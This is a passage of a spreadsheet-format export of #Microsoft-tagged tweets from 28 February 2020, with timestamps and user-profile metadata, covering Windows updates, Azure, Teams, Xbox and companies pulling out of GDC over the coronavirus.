    <t>What are those Windows 10 PCs running? Several flavours from 2019, by the looks of things #Microsoft https://t.co/sdjCYGgl5r https://t.co/ECzTSornyk</t>
  </si>
  <si>
    <t>Fri Feb 28 09:23:16 +0000 2020</t>
  </si>
  <si>
    <t>It can tough to be a #Microsoft expert when there are always updates with something new to #learn 
#Training your #employees with the most up-to-date versions of Microsoft Office doesn't have to be a challenge 
Explore #content with eloomi today: https://t.co/ntcLwNQkbQ https://t.co/uQNxoozc8F</t>
  </si>
  <si>
    <t>{'id': 3110818047, 'id_str': '3110818047', 'name': 'eloomi', 'screen_name': 'eloomiGO', 'location': 'Copenhagen, Denmark', 'description': 'Welcome to eloomi, the new #employeeexperience. People growth, engagement &amp; productivity - all in a single solution.', 'url': 'https://t.co/rh2xdazgzk', 'entities': {'url': {'urls': [{'url': 'https://t.co/rh2xdazgzk', 'expanded_url': 'http://www.eloomi.com', 'display_url': 'eloomi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 254, 'listed_count': 18, 'created_at': 'Tue Mar 24 16:55:26 +0000 2015', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 268,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'http://pbs.twimg.com/profile_images/970961148525850624/OdZ8jrWD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970961148525850624/OdZ8jrWD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3110818047/1580112802',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</si>
  <si>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09:22:45 +0000 2020</t>
  </si>
  <si>
    <t>What would I do to become a successful full-time Microsoft #Freelancer? #employment #BecomeSuccessful https://t.co/FZYGHupAqy #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 09:21:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is the latest company to pull out of #GDC2020 https://t.co/wpKsYr7keD</t>
  </si>
  <si>
    <t>{'id': 13203132, 'id_str': '13203132', 'name': 'Massimo Allievi', 'screen_name': 'mallievi', 'location': 'Milan', 'description': 'Esploro, scrivo, traduco, pubblico. ðŸ“š Ex Computer Magazine, Mac magazine. ðŸ‘‰ðŸ» @godigitalit ðŸ‘‰ðŸ» https://t.co/jCJFUXFJEd ðŸ‘‰ðŸ» https://t.co/zhYmN8Jerq', 'url': 'https://t.co/73c9cVl1VW', 'entities': {'url': {'urls': [{'url': 'https://t.co/73c9cVl1VW', 'expanded_url': 'http://it.linkedin.com/in/massimoallievi', 'display_url': 'it.linkedin.com/in/massimoalliâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/jCJFUXFJEd', 'expanded_url': 'http://fb.me/gfedeliottica', 'display_url': 'fb.me/gfedeliottica', 'indices': [93, 116]}, {'url': 'https://t.co/zhYmN8Jerq', 'expanded_url': 'http://www.allzeta.blog', 'display_url': 'allzeta.blog', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 2246, 'friends_count': 4934, 'listed_count': 203, 'created_at': 'Thu Feb 07 13:12:02 +0000 2008', 'favourites_count': 4704, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24209,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'http://pbs.twimg.com/profile_images/477324044459868160/n5LP4nvz_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/477324044459868160/n5LP4nvz_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/13203132/1498646049',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</si>
  <si>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Feb 28 09:21:15 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10s latest update is causing havoc and it could break your PC  #MicrosoftWindows #Redmond #MICROSOFT https://t.co/E7iLjK7E5Q https://t.co/O5thxjORlx</t>
  </si>
  <si>
    <t>Fri Feb 28 09:19:47 +0000 2020</t>
  </si>
  <si>
    <t>Analytics India Magazine got in touch with Manish Gupta, Principal Applied Scientist at @Microsoft for our weekly column My #Journey In #DataScience. Read more at 
https://t.co/FLFgDb3Uy1
#journeytogrowth #microsoft #research #AI #mlearning</t>
  </si>
  <si>
    <t>{'id': 908230076, 'id_str': '908230076', 'name': 'Analytics India Magazine', 'screen_name': 'Analyticsindiam', 'location': 'Bengaluru, Karnataka', 'description': "India's leading publisher chronicling advances in Analytics, Big Data, Artificial Intelligence and Data Science.", 'url': 'https://t.co/FfMLw6uyWY', 'entities': {'url': {'urls': [{'url': 'https://t.co/FfMLw6uyWY', 'expanded_url': 'https://analyticsindiamag.com', 'display_url': 'analyticsindiamag.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10217, 'friends_count': 237, 'listed_count': 228, 'created_at': 'Sat Oct 27 14:31:20 +0000 2012', 'favourites_count': 12277, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14643,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'http://pbs.twimg.com/profile_images/1190136698962894849/NNdyVORO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190136698962894849/NNdyVORO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/908230076/1572498056',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</si>
  <si>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09:17:42 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Azure Cloud Computing Platform
 Security
 Scalability
 Worldwide Access
 Hybrid Capability
  Flexibility 
https://t.co/QPf2eDqxk8
#TechZerone #Azure #MSAzure #Microsoft https://t.co/W0NgWuy30n</t>
  </si>
  <si>
    <t>{'id': 4554344064, 'id_str': '4554344064', 'name': 'Zerone Technologies', 'screen_name': 'TechZerone', 'location': 'Gurgaon, India', 'description': 'Zerone Technologies, a leading System Integration Company offers products and solutions in IT, Telecom Infrastructure and Software Solutions', 'url': 'https://t.co/uHuSNgQTlX', 'entities': {'url': {'urls': [{'url': 'https://t.co/uHuSNgQTlX', 'expanded_url': 'http://www.zeronetechnologies.com', 'display_url': 'zeronetechnologies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 87, 'listed_count': 43, 'created_at': 'Mon Dec 14 07:20:19 +0000 2015', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 399,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'http://pbs.twimg.com/profile_images/676301535387607040/xucwncc3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/676301535387607040/xucwncc3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4554344064/1503475141',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</si>
  <si>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09:16:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Linux Conference WSLConf is SOLD OUT for General Admission
 #Microsoft
https://t.co/gwWEKA9ZWt</t>
  </si>
  <si>
    <t>Fri Feb 28 09:15:14 +0000 2020</t>
  </si>
  <si>
    <t>Work or entertainment, the Microsoft Surface Laptop 3 can handle any tasks thrown at it with ease. You can opt for the bundle with Mobile Mouse with or without Office 365 Personal from RM4999 onwards! See it at https://t.co/6zeoOH0ZBh
#SenhengMY #Microsoft #SurfaceLaptop3 https://t.co/B87cH1gCBh</t>
  </si>
  <si>
    <t>{'id': 99906298, 'id_str': '99906298', 'name': 'SENHENG Malaysia', 'screen_name': 'SenhengMY', 'location': 'Malaysia', 'description': "Malaysia's leading consumer electronics retail chain stores. Need assistance? Call us at +6016 299 1398, 930am-530pm, Mon-Fri.", 'url': 'https://t.co/4iGQepOXTI', 'entities': {'url': {'urls': [{'url': 'https://t.co/4iGQepOXTI', 'expanded_url': 'https://www.senheng.com.my', 'display_url': 'senheng.com.my', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 978, 'friends_count': 13, 'listed_count': 12, 'created_at': 'Mon Dec 28 09:20:36 +0000 2009', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3236, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '008738', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1083641124307197952/aZZ6Fd4X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083641124307197952/aZZ6Fd4X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99906298/1583114053', 'profile_link_color': '006905', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '008738', 'profile_text_color': 'E3E3E3', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 09:15:06 +0000 2020</t>
  </si>
  <si>
    <t>Key Reasons Behind the Omnipresent Dominance of Microsoft Stack for Enterprise Projects https://t.co/9XQlOCNu6d #softwaredevelopment #technologies #Microsoft #SQLServer #dotnet #programming #webdevelopment #VisualStudio #SQL #Technology</t>
  </si>
  <si>
    <t>{'id': 1004267595850309637, 'id_str': '1004267595850309637', 'name': 'Olivia Smith', 'screen_name': 'OliviaS97037757', 'location': 'United States', 'description': 'Magento Developer, Technical Writer and blogger who writes on #MagentoTechnology. Currently working with #magento #development company.', 'url': 'https://t.co/aiCCBu4669', 'entities': {'url': {'urls': [{'url': 'https://t.co/aiCCBu4669', 'expanded_url': 'http://bit.ly/2Hqvfhl', 'display_url': 'bit.ly/2Hqvfhl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4428, 'friends_count': 4699, 'listed_count': 16, 'created_at': 'Wed Jun 06 07:43:48 +0000 2018', 'favourites_count': 1115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2910, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1004271434426920960/w-GBQLJZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1004271434426920960/w-GBQLJZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1004267595850309637/1528274569',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</si>
  <si>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09:15:03 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus Threat Causes Microsoft, Epic, Unity to Withdraw From GDC 2020 https://t.co/lXhOwGUwEO
via @Gadgets360 #computing #microsoft https://t.co/xS45Jxbo5y</t>
  </si>
  <si>
    <t>Fri Feb 28 09:14:49 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft - What would I do to become a successful full-time Microsoft Freelancer? https://t.co/V6O1C1rgIW</t>
  </si>
  <si>
    <t>Fri Feb 28 09:14:31 +0000 2020</t>
  </si>
  <si>
    <t>We spend twice as much time collaborating today than 5 years ago and we need tools to help us do that. 
@GreenanKat is first up with her overview of what #Microsoft Teams is and the business benefits of using it. https://t.co/3KQUXqaR7V</t>
  </si>
  <si>
    <t>Fri Feb 28 09:14:23 +0000 2020</t>
  </si>
  <si>
    <t>A new template will be available soon.
The template allows you to assign themes to the floors, spaces and elements of the Ifc file.
Subscribe at https://t.co/gBhsp1EgGb to try Vcad!
#bim #PowerBI #Microsoft #vcad #ifc #customvisual #3D #blogic #ifcviewer https://t.co/f7A5ofb1ww</t>
  </si>
  <si>
    <t>{'id': 1084079014321508353, 'id_str': '1084079014321508353', 'name': 'Bim Services - Vcad', 'screen_name': 'BimVcad', 'location': 'Roma, Lazio', 'description': 'The real solution for Spaces, Assets and #BimManagement #MSPowerBI #BIM #buildinginformationmodeling #powerbi', 'url': 'https://t.co/ierWthsax3', 'entities': {'url': {'urls': [{'url': 'https://t.co/ierWthsax3', 'expanded_url': 'https://www.bimservices.it', 'display_url': 'bimservices.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 161, 'friends_count': 79, 'listed_count': 1, 'created_at': 'Sat Jan 12 13:25:53 +0000 2019', 'favourites_count': 349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 138, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1084079079228362752/8yshXCkB_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084079079228362752/8yshXCkB_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1084079014321508353/1547300008',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</si>
  <si>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09:14:17 +0000 2020</t>
  </si>
  <si>
    <t>Collaboration, communication &amp;amp; connectivity. #Teams is reportedly #Microsofts fastest growing application, allowing for smarter cooperative working in a powerful &amp;amp; holistic environment. 
Our new blog &amp;amp; eBook explain more on the software: https://t.co/bg7QHsNkjf https://t.co/h2MsnaYlqT</t>
  </si>
  <si>
    <t>{'id': 71201913, 'id_str': '71201913', 'name': 'Mirus IT Solutions', 'screen_name': 'mirusit', 'location': 'Milton Keynes', 'description': 'Mirus IT, an IT Lab Company, provides strategic #IT Services &amp; Support to #SMEs &amp; #SMBs #CloudComputing #CyberSecurity #Virtualisation #ManagedPrint', 'url': 'https://t.co/AaHpmMgJ3P', 'entities': {'url': {'urls': [{'url': 'https://t.co/AaHpmMgJ3P', 'expanded_url': 'http://www.mirus-it.co.uk', 'display_url': 'mirus-it.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6611, 'friends_count': 3551, 'listed_count': 81, 'created_at': 'Thu Sep 03 07:58:50 +0000 2009', 'favourites_count': 4116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5537, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050505', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1163363859824087040/pU-3GuU9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1163363859824087040/pU-3GuU9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/71201913/1582540969', 'profile_link_color': '80B041', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '999999', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 09:13:32 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus: #Facebook cancels conference, #Microsoft withdraws from another
https://t.co/nJnhR1v35z</t>
  </si>
  <si>
    <t>Fri Feb 28 09:10:31 +0000 2020</t>
  </si>
  <si>
    <t>#CVE-2020-0688: Remote Code Execution on #Microsoft #Exchange #Server Through Fixed #Cryptographic Keys  https://t.co/tOgouAfSz0
#CyberAttack #cybercrime #CyberSecurity</t>
  </si>
  <si>
    <t>{'id': 734685586167074820, 'id_str': '734685586167074820', 'name': 'nlawarp', 'screen_name': 'nlawarp', 'location': 'London, England', 'description': 'NLAWARP, the UK Wider Public Sector Cyber Collaboration Programme. #CyberSecurity #CyberResilience', 'url': 'https://t.co/FUJwCEeChT', 'entities': {'url': {'urls': [{'url': 'https://t.co/FUJwCEeChT', 'expanded_url': 'http://www.nlawarp.net', 'display_url': 'nlawarp.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 104, 'listed_count': 3, 'created_at': 'Mon May 23 10:01:08 +0000 2016', 'favourites_count': 70, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1098,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'http://pbs.twimg.com/profile_images/741216322017763328/8Ux2xgAN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/741216322017763328/8Ux2xgAN_normal.jpg',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</si>
  <si>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09:09:23 +0000 2020</t>
  </si>
  <si>
    <t>Re: Office 365 Email Activity and Data Exfiltration Detection https://t.co/GLxbL3dirA #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 09:07:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/yCkpCI1uKh #Azure #ExpressRoute #HybridCloud #AzOps #CloudArchitects https://t.co/mVvWnsYYyH</t>
  </si>
  <si>
    <t>Fri Feb 28 09:05:41 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is running #github at a loss just to dominate the #freesw community and basically oppress the competition. The business model is, ensure the rivals are disrupted (even at great cost). #antitrust #abuse</t>
  </si>
  <si>
    <t>Fri Feb 28 09:04:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft launches the Data Protection Mapping Project
https://t.co/HMe2b1znXD
#Azure #Microsoft https://t.co/yK28gSicxo</t>
  </si>
  <si>
    <t>Fri Feb 28 09:02:38 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/S0FCy7GjrN #Azure #MPI #HPC #Cloud #ComputePower #AzOps</t>
  </si>
  <si>
    <t>Fri Feb 28 09:02:00 +0000 2020</t>
  </si>
  <si>
    <t>One for the knowledge base - you can't use 'History' as a name for a worksheet in #excel #Microsoft</t>
  </si>
  <si>
    <t>{'id': 794261263060762624, 'id_str': '794261263060762624', 'name': 'Tom Cox', 'screen_name': 'ICT_Tom_', 'location': 'South Wales', 'description': 'EduIT | Office 365 | AD | G-Suite | Digital Skills', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 145, 'listed_count': 2, 'created_at': 'Thu Nov 03 19:33:36 +0000 2016', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 132,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'http://pbs.twimg.com/profile_images/1014112506346909701/X3UVow23_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1014112506346909701/X3UVow23_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/794261263060762624/1543226667', 'profile_link_color': '002147',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</si>
  <si>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09:01:07 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 could get a new Start menu as #Microsoft kills off one of its most useless features https://t.co/e7xeysjw6v https://t.co/1A497IBy2T</t>
  </si>
  <si>
    <t>Fri Feb 28 09:00:42 +0000 2020</t>
  </si>
  <si>
    <t>We combine industry knowledge with #technology expertise on https://t.co/qWyRTFf3Ve, #Microsoft SharePoint, Java / J2EE, #IBM WebSphere, and other leading portal technologies to deliver end-to-end, #custom portal solutions to our clients. Know more https://t.co/MPy4I0LM2P https://t.co/gWOFVztmqK</t>
  </si>
  <si>
    <t>{'id': 132804593, 'id_str': '132804593', 'name': 'FutureSoft India', 'screen_name': 'FutureSoftIndia', 'location': 'Delhi, Mumbai, Noida', 'description': 'FutureSoft is a software consulting and technology services company specializing in industry-specific solutions, strategic outsourcing and integration services.', 'url': 'https://t.co/9TB8ktAWfm', 'entities': {'url': {'urls': [{'url': 'https://t.co/9TB8ktAWfm', 'expanded_url': 'https://futuresoftindia.com', 'display_url': 'futuresoftindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 86, 'listed_count': 1, 'created_at': 'Wed Apr 14 06:39:38 +0000 2010', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 70,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'http://pbs.twimg.com/profile_images/1024948032746311681/Il5am5VD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024948032746311681/Il5am5VD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/132804593/1533202219',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</si>
  <si>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Feb 28 09:00:36 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for next weeks webinar for tips and tricks when protecting Office 365 data with the industrys best Office 365 backup solution! #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/Ii9jrZT0JE</t>
  </si>
  <si>
    <t>Fri Feb 28 09:00:35 +0000 2020</t>
  </si>
  <si>
    <t>Read my Feb 28 #Microsoft Newsletter featuring Excel Hyperlink... https://t.co/AmhtTFlhmc Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Fri Feb 28 09:00:24 +0000 2020</t>
  </si>
  <si>
    <t>Happy to participate in the @EuroCloudConf [Nice,2-4 June 2020]. to share my #experience and learn more.
https://t.co/nUpMCO9zm9
@Ungoti 
@EuropeanS
#EuropeanAzure
#IT #Cloud
#CloudComputing 
#Microsoft #Azure
#european #conference 
#CognitiveComputing 
#AI #serverless #Microsoft</t>
  </si>
  <si>
    <t>{'id': 87931518, 'id_str': '87931518', 'name': 'JosÃ© M Voces GarcÃ­a', 'screen_name': 'voces25', 'location': 'Madrid, Comunidad de Madrid', 'description': 'Tech Strategist, building #Cloud &amp; #DigitalTransformation teams &amp; programs.      Growth Marketer &amp; CMO.   âœ‰  voces25@gmail.com  âœ‰ https://t.co/ySPNXSijUC', 'url': 'https://t.co/hUnqOvfS2i', 'entities': {'url': {'urls': [{'url': 'https://t.co/hUnqOvfS2i', 'expanded_url': 'https://buff.ly/2ocVbqa', 'display_url': 'buff.ly/2ocVbqa', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ySPNXSijUC', 'expanded_url': 'http://www.ungoti.com', 'display_url': 'ungoti.com', 'indices': [130, 153]}]}}, 'protected': False, 'followers_count': 3216, 'friends_count': 2383, 'listed_count': 1342, 'created_at': 'Fri Nov 06 12:43:30 +0000 2009', 'favourites_count': 47857, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 30949,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'http://pbs.twimg.com/profile_images/568863835331633152/4bKv0Pg0_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/568863835331633152/4bKv0Pg0_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87931518/1531987111',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</si>
  <si>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09:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Windows 7 has come to its end of life and is no longer be sending out security patches, what are the security risks for you and what should you do next?
#EoL #Microsoft7 #Microsoft #ITSecurity #SecurityBreach #radius #Waterford https://t.co/wEwSVZs1fC</t>
  </si>
  <si>
    <t>{'id': 3375576347, 'id_str': '3375576347', 'name': 'RadiusTechnologies', 'screen_name': 'radiustechltd', 'location': 'Waterford, Ireland', 'description': 'Based in #Waterford #Carlow #Dublin| Leading provider of #specialist #IT | #NetworkSolutions |  #TelephoneSystems | #ITSupport | #CloudComputing | #ITSecurity', 'url': 'https://t.co/n4T5AN8m2N', 'entities': {'url': {'urls': [{'url': 'https://t.co/n4T5AN8m2N', 'expanded_url': 'http://www.radius.ie/', 'display_url': 'radius.ie', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 607, 'friends_count': 444, 'listed_count': 14, 'created_at': 'Tue Jul 14 11:23:56 +0000 2015', 'favourites_count': 371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 434,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'http://pbs.twimg.com/profile_images/620923031431585792/BxjWq5uq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/620923031431585792/BxjWq5uq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3375576347/1436874003',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</si>
  <si>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09:00:13 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/8UwNQHrpRd</t>
  </si>
  <si>
    <t>Fri Feb 28 09:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will be serving #Azure , #Office365 &amp;amp; #Dynamics365 from the new #cloud #datacenters in #Spain , and #Telefonica will be delivering more capabilities from this new #region once it opens. https://t.co/9f2TJjNT3Q #MSFTAdvocate</t>
  </si>
  <si>
    <t>Fri Feb 28 08:47:50 +0000 2020</t>
  </si>
  <si>
    <t>#Kinyarwanda, #Kiswahili,... I mean smthg should be done to get #Kirundi also promoted as recognized language by gigants #Microsoft, #Google https://t.co/W28qDlR6YH</t>
  </si>
  <si>
    <t>{'id': 2353218559, 'id_str': '2353218559', 'name': 'BAKINA Eddy Patrick', 'screen_name': 'BakinaEDDY', 'location': 'Brussel, BelgiÃ«', 'description': 'SharePoint-O365 Consultant - Microsoft Certified both Service Adoption Specialist &amp; Migration - Passionate for #CloudComputing\n#DigitalTransformation is the key', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 474, 'friends_count': 205, 'listed_count': 14, 'created_at': 'Thu Feb 20 13:05:58 +0000 2014', 'favourites_count': 5349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5300,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'http://pbs.twimg.com/profile_images/1113833533812936704/Xas3g-bo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113833533812936704/Xas3g-bo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2353218559/1548422786',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</si>
  <si>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08:46:46 +0000 2020</t>
  </si>
  <si>
    <t>With all the recent woes of #Microsoft #Windows updates, and especially with some users losing all of their local data (permanently)...at a minimum users should be deferring updates until the myriad issues are resolved. Home users might consider #Linux.
https://t.co/bhejA6dvA8</t>
  </si>
  <si>
    <t>{'id': 1177397927846785024, 'id_str': '1177397927846785024', 'name': 'Evan Ottinger', 'screen_name': 'evan_ottinger', 'location': '', 'description': 'IT professional. Cybersecurity enthusiast.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 64, 'listed_count': 0, 'created_at': 'Fri Sep 27 01:42:11 +0000 2019', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 247, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1177399117183668224/7GXPgYCL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177399117183668224/7GXPgYCL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1177397927846785024/1570805748',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</si>
  <si>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08:44:39 +0000 2020</t>
  </si>
  <si>
    <t>#LarryHryb, the head of #Microsoft Xbox Live, has announced a new quick resume feature for the #XboxSeriesX, which would instantly resume multiple games after the console has rebooted, or even after switching titles.
@Xbox @Microsoft https://t.co/hg7ATJ5LPu</t>
  </si>
  <si>
    <t>Fri Feb 28 08:41:23 +0000 2020</t>
  </si>
  <si>
    <t>We are proud to announce that on the 5th of March, the #Microsoft and #Sharp Connected Event will happen simultaneously in Amsterdam,  Madrid, New York. Topics will range from the importance of #IoT and #Cloud based Services, to creating the perfect meeting conditions. https://t.co/xmyL2XqxnT</t>
  </si>
  <si>
    <t>{'id': 53401745, 'id_str': '53401745', 'name': 'Sharp Business Europe', 'screen_name': 'Sharp_Europe', 'location': 'London', 'description': 'Our vision is to transform the way organisations engage with information through connected technologies.', 'url': 'https://t.co/lW3OrlTl73', 'entities': {'url': {'urls': [{'url': 'https://t.co/lW3OrlTl73', 'expanded_url': 'http://www.sharp.eu/insights/', 'display_url': 'sharp.eu/insights/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12128, 'friends_count': 407, 'listed_count': 132, 'created_at': 'Fri Jul 03 14:41:23 +0000 2009', 'favourites_count': 1145, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6484,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'http://pbs.twimg.com/profile_images/902836130868903936/X7IBVGBB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/902836130868903936/X7IBVGBB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/53401745/1506931144', 'profile_link_color': 'E81C4F',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</si>
  <si>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Fri Feb 28 08:40:58 +0000 2020</t>
  </si>
  <si>
    <t>Its pay day, so Ive decided to put aside 1k for either the #PS5 or #XboxSeriesX . I look forward to the next several months where #Sony &amp;amp; #Microsoft will fight for my money!</t>
  </si>
  <si>
    <t>{'id': 1171721520768528385, 'id_str': '1171721520768528385', 'name': 'Media MAC', 'screen_name': 'MediaMAC4', 'location': '', 'description': '70% of people will believe any data presented as a percentile regardless of source, and you can be 100% on that...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 18, 'listed_count': 0, 'created_at': 'Wed Sep 11 09:46:18 +0000 2019', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 435, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216483534027792386/S7BaS4X8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216483534027792386/S7BaS4X8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1171721520768528385/1568197059',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</si>
  <si>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08:39:41 +0000 2020</t>
  </si>
  <si>
